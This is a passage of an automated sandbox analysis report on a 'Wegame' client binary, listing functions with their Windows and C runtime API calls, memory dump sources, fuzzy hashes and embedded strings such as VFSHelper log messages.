                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD87
                                                                • memmove.VCRUNTIME140(?,00000000,?,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD9F
                                                                • memset.VCRUNTIME140(?,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043ADAD
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043ADFB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$memset$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3802980928-0
                                                                • Opcode ID: b007e9a87391f8350e0f8a9cb2ddbf9b011bd05113e5b60f9fce822ebb2a1579
                                                                • Instruction ID: a3b8b5973635181f08ce964ab1d264b1006f1c35863027da60226e41b7011c5a
                                                                • Opcode Fuzzy Hash: b007e9a87391f8350e0f8a9cb2ddbf9b011bd05113e5b60f9fce822ebb2a1579
                                                                • Instruction Fuzzy Hash: A0413771D00110AFDB14DB69CC41AAFB7A9EF48314F15822EE856A3690D734ED11C79A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045018B Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00450192
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000028), ref: 00450199
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 004501AF
                                                                • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 004501BB
                                                                • ungetc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 004502D9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$Gninc@?$basic_streambuf@H_prolog3_ungetc
                                                                • String ID:
                                                                • API String ID: 4215999511-0
                                                                • Opcode ID: 8e3593808baee4218cc0cc96471965f4b05e16ffe91078becbbe921092c2201d
                                                                • Instruction ID: 4d21725aafd167e67809099d7bbf2f79bb47b24e57bc14d46a7afd9dc0a2adbb
                                                                • Opcode Fuzzy Hash: 8e3593808baee4218cc0cc96471965f4b05e16ffe91078becbbe921092c2201d
                                                                • Instruction Fuzzy Hash: B8518F35910519DFCB14CFA5C8948EEBBB4FF08321F54015EE912B3292DB34AD49CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00414C50 Relevance: 12.1, APIs: 8, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00415235,85A35C35,00001008,00001008,85A35C35,?,00000000,00000000), ref: 00414C68
                                                                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00415235,85A35C35,00001008,00001008,85A35C35,?,00000000,00000000), ref: 00414C74
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _errno_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 2959964966-0
                                                                • Opcode ID: 2d4ac5ede91fff41207ce19baef743c0c9a4f5b15570bac1caa400b1661358a5
                                                                • Instruction ID: 1042c00150f72572e5c6aec648c9e27aa6634b72f1127467291e42b9302ea020
                                                                • Opcode Fuzzy Hash: 2d4ac5ede91fff41207ce19baef743c0c9a4f5b15570bac1caa400b1661358a5
                                                                • Instruction Fuzzy Hash: 480165736111146FEB102F9DFD446DAB7ACDFD8779F014037F50CC6211E67A988446A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00456C76 Relevance: 12.1, APIs: 8, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00456C7D
                                                                • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,004513A1,00000000), ref: 00456C88
                                                                • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 00456C9F
                                                                • std::locale::_Getfacet.LIBCPMT ref: 00456CA9
                                                                  • Part of subcall function 0044C734: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,00000000,?,004430B7,00000000), ref: 0044C759
                                                                • ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,004411C6,00000000), ref: 00456CC2
                                                                • std::_Facet_Register.LIBCPMT ref: 00456CDA
                                                                • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 00456CFD
                                                                • _CxxThrowException.VCRUNTIME140(?,004966C4), ref: 00456D1C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_Getcat@?$ctype@_GetfacetGetgloballocale@locale@std@@H_prolog3Locimp@12@RegisterThrowV42@@Vfacet@locale@2@W@std@@std::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 2791369340-0
                                                                • Opcode ID: 21fccb0823e912116a9f216f3a61aee7d48336c622f8b0854ef1345b9d0fc4b1
                                                                • Instruction ID: 3fe9d55dca60364eb82fa5eefc47b643021c85f9e0efd8a0a1720235dca7a220
                                                                • Opcode Fuzzy Hash: 21fccb0823e912116a9f216f3a61aee7d48336c622f8b0854ef1345b9d0fc4b1
                                                                • Instruction Fuzzy Hash: 26118935D012199FCF11EFA4D8448DEBBB4EF08310B10456EE815A32A2DB389A45CB89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00438620 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 358COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00439E60: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35,?,?,00000001,000000FF), ref: 00439F86
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002,00000000,00000021,00000000,Missing '}' or object member name,00000021,?,00000001), ref: 00438977
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002,00000000,ezC,00000000,Missing ':' after object member name,00000024), ref: 004389E4
                                                                  • Part of subcall function 0043A010: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A14D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memmove$malloc
                                                                • String ID: Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name$ezC
                                                                • API String ID: 3979066152-1887329830
                                                                • Opcode ID: b4706d5f4bc74e08255747ae06affc2db0e06485102230ce34f6b7d1b80150fa
                                                                • Instruction ID: a9cf29db409112eb76aa806dd9f5426e15857cf9e4d1bc43237d614a3ea64a8a
                                                                • Opcode Fuzzy Hash: b4706d5f4bc74e08255747ae06affc2db0e06485102230ce34f6b7d1b80150fa
                                                                • Instruction Fuzzy Hash: 64D1E270A003099BDB18DF95C885BAEF7B6EF49304F24551EF411AB381DB38E944CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00416C50 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 299COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0041653C,?,?,-00000010,00000000,?,?,?,?,85A35C35), ref: 00416C6D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0041653C,?,?,-00000010,00000000,?,?,?,?,85A35C35), ref: 00416CC7
                                                                Strings
                                                                • VFileSysBase::DeleteFile() , xrefs: 0041C431
                                                                • VFileSysBase::DeleteFile() , xrefs: 0041C4A6
                                                                • VFileSysBase::DeleteFile() , xrefs: 0041C539
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturnfree
                                                                • String ID: VFileSysBase::DeleteFile() $VFileSysBase::DeleteFile() $VFileSysBase::DeleteFile()
                                                                • API String ID: 2293887081-1912354006
                                                                • Opcode ID: 46687880c0046fd63ec30eeedbd583c85113e90a0ee321575b8b9c1e0fecb3b2
                                                                • Instruction ID: d9fdd54b7f5168cd1f50c34a35d8f4c8a5ea5a403543a9f24daadddeab0c7c75
                                                                • Opcode Fuzzy Hash: 46687880c0046fd63ec30eeedbd583c85113e90a0ee321575b8b9c1e0fecb3b2
                                                                • Instruction Fuzzy Hash: 26C19B71A002149FCB14CF58EDC5BAE7BB5EB09318F14056EE805AB391D738E985CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402EC0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 196COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 00402F02
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00403029
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00403087
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00403107
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00403118
                                                                Strings
                                                                • VFSHelper::SetWorkDirectory() , xrefs: 0040309D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                                • String ID: VFSHelper::SetWorkDirectory()
                                                                • API String ID: 363805048-2983149126
                                                                • Opcode ID: 305dbb1cc48a485dee7dd8ac4e93356c1e8202d8d7e2b14f0285c54e694c908e
                                                                • Instruction ID: ceeb23ec48cf9a3c10841004f295b558f424cfbf095bc261025dc771a1ba799c
                                                                • Opcode Fuzzy Hash: 305dbb1cc48a485dee7dd8ac4e93356c1e8202d8d7e2b14f0285c54e694c908e
                                                                • Instruction Fuzzy Hash: 0171D431E002498BCB04CFA8CD497EEBBB6EF45318F14012AE405BB3D4D779AA85CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040A1C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 0040A202
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A327
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A385
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001), ref: 0040A3F8
                                                                • LeaveCriticalSection.KERNEL32(?,?,00000001), ref: 0040A41D
                                                                Strings
                                                                • VFSHelper::OutputSequenceFile() , xrefs: 0040A39B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                                • String ID: VFSHelper::OutputSequenceFile()
                                                                • API String ID: 363805048-1191238597
                                                                • Opcode ID: db0b518bf38dfe57c58aae8372311cc73c5221a6a422584ebb90199f56d648b0
                                                                • Instruction ID: d87c83041f2d3cc5d58a19644df7f206ea520ced7b4951eab6ce84acaab17f90
                                                                • Opcode Fuzzy Hash: db0b518bf38dfe57c58aae8372311cc73c5221a6a422584ebb90199f56d648b0
                                                                • Instruction Fuzzy Hash: 2971D271E103498FDB04DFA8C9457DEBBB2EF45308F20422EE405AB390D7796A95CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040ADD0 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?,?,?,?,00471F38,000000FF), ref: 0040AE02
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00471F38,000000FF), ref: 0040AE30
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,004028B2,VFSHelper::VFSHelper() ,C:\,?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00413705
                                                                  • Part of subcall function 004136E0: memset.VCRUNTIME140(?,00000000,00000800,?,?,?,?,?,?,?,?,00001000), ref: 00413738
                                                                  • Part of subcall function 004136E0: OutputDebugStringW.KERNEL32(?), ref: 0041376C
                                                                Strings
                                                                • VFSHelper::UpdateKey() , xrefs: 0040B011
                                                                • VFSHelper::UpdateKey() vfsRoot, xrefs: 0040AEBB
                                                                • (VFS_DEFAULT_AES_KEY), xrefs: 0040AEEB
                                                                • VFSHelper::UpdateKey() , xrefs: 0040AE18
                                                                • VFSHelper::UpdateKey() vfs, xrefs: 0040AE95
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionmemset$DebugEnterLeaveOutputString
                                                                • String ID: (VFS_DEFAULT_AES_KEY)$VFSHelper::UpdateKey() $VFSHelper::UpdateKey() $VFSHelper::UpdateKey() vfs$VFSHelper::UpdateKey() vfsRoot
                                                                • API String ID: 1368408445-1847941951
                                                                • Opcode ID: 6f4e5a8add8c5a6976a7aeb95e7cfc76dc3195c14b4c11c5924c59f47bd65660
                                                                • Instruction ID: 34b3cba02080bd371441bf7201f5a92ec8f90b23f979e6c7189900a98593548c
                                                                • Opcode Fuzzy Hash: 6f4e5a8add8c5a6976a7aeb95e7cfc76dc3195c14b4c11c5924c59f47bd65660
                                                                • Instruction Fuzzy Hash: E06128716003419FDB24CF18C884BAB7BA1EF11314F18857EE8596B3D1D739AC95CB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00450703 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045070D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,0000009C), ref: 0045072C
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,0000009C), ref: 0045077F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 004507F3
                                                                Strings
                                                                • [TPF_UI], xrefs: 0045079F
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\inc\tpfuiloger.h, xrefs: 00450827
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@H_prolog3_U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@
                                                                • String ID: [TPF_UI]$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\inc\tpfuiloger.h
                                                                • API String ID: 1418758211-4018008984
                                                                • Opcode ID: f245a13dfe17ea6887151a1d19d306e60313e7457196440d7333d313f3860018
                                                                • Instruction ID: 48e6c7bb9d4e3f94ce74d13eabbb84f9ffebbf8c1bf409d375ee7c41c092ff84
                                                                • Opcode Fuzzy Hash: f245a13dfe17ea6887151a1d19d306e60313e7457196440d7333d313f3860018
                                                                • Instruction Fuzzy Hash: 8F41A871D01248EFCF05EBE5C841BDEBBB4AF55304F14419ED505AB282DB385A49CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004487FC Relevance: 10.6, APIs: 7, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00448806
                                                                • memset.VCRUNTIME140(?,00000000,00000414,00000640), ref: 00448845
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0044888D
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?,?,00000000,00000208), ref: 0044889F
                                                                • PathAppendW.SHLWAPI(?,?), ref: 004488B6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$AppendH_prolog3_Pathwcscpy_s
                                                                • String ID:
                                                                • API String ID: 3416047758-0
                                                                • Opcode ID: 5ef3f8ff1ba47c0df5576658c17a8b27b2df2dee8ea965660438c88f706aac9a
                                                                • Instruction ID: b01057dc0295629812f4d50357bfb562705b9b5f9ccfc838c7014d9d38b24972
                                                                • Opcode Fuzzy Hash: 5ef3f8ff1ba47c0df5576658c17a8b27b2df2dee8ea965660438c88f706aac9a
                                                                • Instruction Fuzzy Hash: 614182719006199BDB24DB64CC85BEEB3B9BF44714F0041AEE509A7251DF38DE90CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043EDA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043EDAA
                                                                  • Part of subcall function 0043DEA7: __EH_prolog3.LIBCMT ref: 0043DEAE
                                                                  • Part of subcall function 0043DEA7: ?directory_iterator_construct@detail@filesystem@ierd_tgp@@YAXAAVdirectory_iterator@23@ABVpath@23@PAVerror_code@std@@@Z.COMMON(?,?,?,00000010), ref: 0043DF05
                                                                • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 0043EE2A
                                                                • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,fileinfo.hash,?,?), ref: 0043EE41
                                                                • ?remove@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(00000000,?,?,00000000,?), ref: 0043EED1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Verror_code@std@@@$?directory_iterator_construct@detail@filesystem@ierd_tgp@@?filename@path@filesystem@ierd_tgp@@?remove@filesystem@ierd_tgp@@H_prolog3H_prolog3_V123@Vdirectory_iterator@23@Vpath@12@Vpath@23@_wcsicmp
